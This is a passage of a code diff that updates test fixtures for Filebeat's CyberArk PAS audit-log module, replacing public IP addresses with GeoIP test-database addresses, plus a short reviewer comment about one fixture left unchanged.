@@ -472,7 +463,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6097,
+ "log.offset": 6094,
 "log.syslog.priority": "5",
 "network.direction": "inbound",
 "observer.hostname": "VAULT",
@@ -481,22 +472,20 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "related.user": [
 "Administrator",
 "PVWAGWUser"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.user.name": "PVWAGWUser",
 "tags": [
 "cyberarkpas.audit",
@@ -508,23 +497,26 @@
 "@timestamp": "2021-03-14T13:49:35.000Z",
 "cyberarkpas.audit.action": "Full Gateway Connection",
 "cyberarkpas.audit.desc": "Full Gateway Connection",
- "cyberarkpas.audit.gateway_station": "34.71.250.247",
+ "cyberarkpas.audit.gateway_station": "81.2.69.143",
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:35Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Full Gateway Connection",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 81.2.69.143\n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_SSH",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 14 06:49:35",
- "destination.address": "34.71.250.247",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "34.71.250.247",
+ "destination.address": "81.2.69.143",
+ "destination.geo.city_name": "London",
+ "destination.geo.continent_name": "Europe",
+ "destination.geo.country_iso_code": "GB",
+ "destination.geo.country_name": "United Kingdom",
+ "destination.geo.location.lat": 51.5142,
+ "destination.geo.location.lon": -0.0931,
+ "destination.geo.region_iso_code": "GB-ENG",
+ "destination.geo.region_name": "England",
+ "destination.ip": "81.2.69.143",
 "destination.user.name": "Administrator",
 "event.action": "full gateway connection",
 "event.category": [
@@ -543,7 +535,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 7607,
+ "log.offset": 7602,
 "log.syslog.priority": "5",
 "network.direction": "external",
 "observer.hostname": "VAULT",
@@ -551,24 +543,21 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247",
- "81.32.170.205"
+ "67.43.156.14",
+ "81.2.69.143"
 ],
 "related.user": [
 "Administrator",
 "PSMPGW_SSH"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "source.user.name": "PSMPGW_SSH",
 "tags": [
 "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
index 90d668dbefba..043f0882d907 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
@@ -95,11 +95,6 @@
 "cyberarkpas.audit.station": "10.0.1.20",
 "cyberarkpas.audit.timestamp": "Mar 15 03:22:44",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "testark",
 "event.action": "cpm verify password",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
index 51629665b2bf..b9b397d22bd5 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
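Review bot: The 22_cpm_verify_password expected file keeps `34.123.103.115` in `destination.address` and `destination.ip` and only drops its `destination.geo.*` fields, so this fixture is left holding a real-looking public address while the sibling fixtures in this change (187_add_folder, 19_full_gateway_connection, 23_action_on_closed_safe) were moved onto the 67.43.156.x, 81.2.69.143 and 216.160.83.61 ranges. If the goal is to keep every sample on addresses the test GeoIP database knows, that address should be replaced and the expected file regenerated; if it is deliberately kept to cover the no-geo-match path, a short line in the module's test README saying so would spare the next maintainer the question. The new geo values (Bhutan 27.5/90.5, Milton US-WA, London GB-ENG) look like the MaxMind test-database entries rather than production lookups, which means these expected files now assume that database is the one loaded when the pipeline tests run; worth stating in the fixture generation notes.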
@@ -1,3 +1,3 @@ -<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:27\n 2021-03-14T12:07:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n PasswordManager\n Action On Closed Safe\n \n \n AccountsFeedADAccounts\n \n 10.0.1.20\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed 
Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} -<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 81.2.69.143\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} 
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
index a8ef4bc0bdbe..37a3ec8dd800 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
@@ -9,7 +9,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Error",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "action on closed safe",
 "event.code": "23",
@@ -29,19 +29,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -71,7 +68,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 599,
+ "log.offset": 598,
 "log.syslog.priority": "7",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -95,11 +92,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Action On Closed Safe",
-"cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n",
+"cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 81.2.69.143\n \n \n \n \n \n Action On Closed Safe\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Error",
-"cyberarkpas.audit.station": "34.71.250.247",
+"cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
 "event.action": "action on closed safe",
 "event.code": "23",
@@ -112,23 +109,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
-"log.offset": 2101,
+"log.offset": 2100,
 "log.syslog.priority": "7",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
-"34.71.250.247"
+"81.2.69.143"
 ],
 "service.type": "cyberarkpas",
-"source.address": "34.71.250.247",
-"source.geo.continent_name": "North America",
-"source.geo.country_iso_code": "US",
-"source.geo.country_name": "United States",
-"source.geo.location.lat": 37.751,
-"source.geo.location.lon": -97.822,
-"source.ip": "34.71.250.247",
+"source.address": "81.2.69.143",
+"source.geo.city_name": "London",
+"source.geo.continent_name": "Europe",
+"source.geo.country_iso_code": "GB",
+"source.geo.country_name": "United Kingdom",
+"source.geo.location.lat": 51.5142,
+"source.geo.location.lon": -0.0931,
+"source.geo.region_iso_code": "GB-ENG",
+"source.geo.region_name": "England",
+"source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
index 7284820d8e4b..4be3af4b8514 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
@@ -1,4 +1,4 @@ -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update 
Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json index 74637ba020f1..6d4a10d3acd8 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json @@ -9,7 +9,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.source_user": "PSMMaster", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:21", "event.action": "add/update group", "event.code": "259", 
@@ -28,19 +28,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
-"81.32.170.205"
+"67.43.156.14"
 ],
 "service.type": "cyberarkpas",
-"source.address": "81.32.170.205",
-"source.geo.city_name": "Barcelona",
-"source.geo.continent_name": "Europe",
-"source.geo.country_iso_code": "ES",
-"source.geo.country_name": "Spain",
-"source.geo.location.lat": 41.3891,
-"source.geo.location.lon": 2.1611,
-"source.geo.region_iso_code": "ES-B",
-"source.geo.region_name": "Barcelona",
-"source.ip": "81.32.170.205",
+"source.address": "67.43.156.14",
+"source.geo.continent_name": "Asia",
+"source.geo.country_iso_code": "BT",
+"source.geo.country_name": "Bhutan",
+"source.geo.location.lat": 27.5,
+"source.geo.location.lon": 90.5,
+"source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -56,7 +53,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
-"cyberarkpas.audit.station": "81.32.170.205",
+"cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:21",
 "event.action": "add/update group",
 "event.code": "259",
@@ -68,26 +65,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
-"log.offset": 585,
+"log.offset": 584,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
-"81.32.170.205"
+"67.43.156.14"
 ],
 "service.type": "cyberarkpas",
-"source.address": "81.32.170.205",
-"source.geo.city_name": "Barcelona",
-"source.geo.continent_name": "Europe",
-"source.geo.country_iso_code": "ES",
-"source.geo.country_name": "Spain",
-"source.geo.location.lat": 41.3891,
-"source.geo.location.lon": 2.1611,
-"source.geo.region_iso_code": "ES-B",
-"source.geo.region_name": "Barcelona",
-"source.ip": "81.32.170.205",
+"source.address": "67.43.156.14",
+"source.geo.continent_name": "Asia",
+"source.geo.country_iso_code": "BT",
+"source.geo.country_name": "Bhutan",
+"source.geo.location.lat": 27.5,
+"source.geo.location.lon": 90.5,
+"source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -103,7 +97,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
-"cyberarkpas.audit.station": "81.32.170.205",
+"cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
 "event.action": "add/update group",
 "event.code": "259",
@@ -115,26 +109,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
-"log.offset": 1172,
+"log.offset": 1170,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
-"81.32.170.205"
+"67.43.156.14"
 ],
 "service.type": "cyberarkpas",
-"source.address": "81.32.170.205",
-"source.geo.city_name": "Barcelona",
-"source.geo.continent_name": "Europe",
-"source.geo.country_iso_code": "ES",
-"source.geo.country_name": "Spain",
-"source.geo.location.lat": 41.3891,
-"source.geo.location.lon": 2.1611,
-"source.geo.region_iso_code": "ES-B",
-"source.geo.region_name": "Barcelona",
-"source.ip": "81.32.170.205",
+"source.address": "67.43.156.14",
+"source.geo.continent_name": "Asia",
+"source.geo.country_iso_code": "BT",
+"source.geo.country_name": "Bhutan",
+"source.geo.location.lat": 27.5,
+"source.geo.location.lon": 90.5,
+"source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -150,7 +141,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMLiveSessionTerminators",
-"cyberarkpas.audit.station": "81.32.170.205",
+"cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:29",
 "event.action": "add/update group",
 "event.code": "259",
@@ -162,26 +153,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
-"log.offset": 1765,
+"log.offset": 1762,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
-"81.32.170.205"
+"67.43.156.14"
 ],
 "service.type": "cyberarkpas",
-"source.address": "81.32.170.205",
-"source.geo.city_name": "Barcelona",
-"source.geo.continent_name": "Europe",
-"source.geo.country_iso_code": "ES",
-"source.geo.country_name": "Spain",
-"source.geo.location.lat": 41.3891,
-"source.geo.location.lon": 2.1611,
-"source.geo.region_iso_code": "ES-B",
-"source.geo.region_name": "Barcelona",
-"source.ip": "81.32.170.205",
+"source.address": "67.43.156.14",
+"source.geo.continent_name": "Asia",
+"source.geo.country_iso_code": "BT",
+"source.geo.country_name": "Bhutan",
+"source.geo.location.lat": 27.5,
+"source.geo.location.lon": 90.5,
+"source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
index bff61c277da8..6c111a700cd2 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
@@ -1,14 +1,14 @@ -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:58:01Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 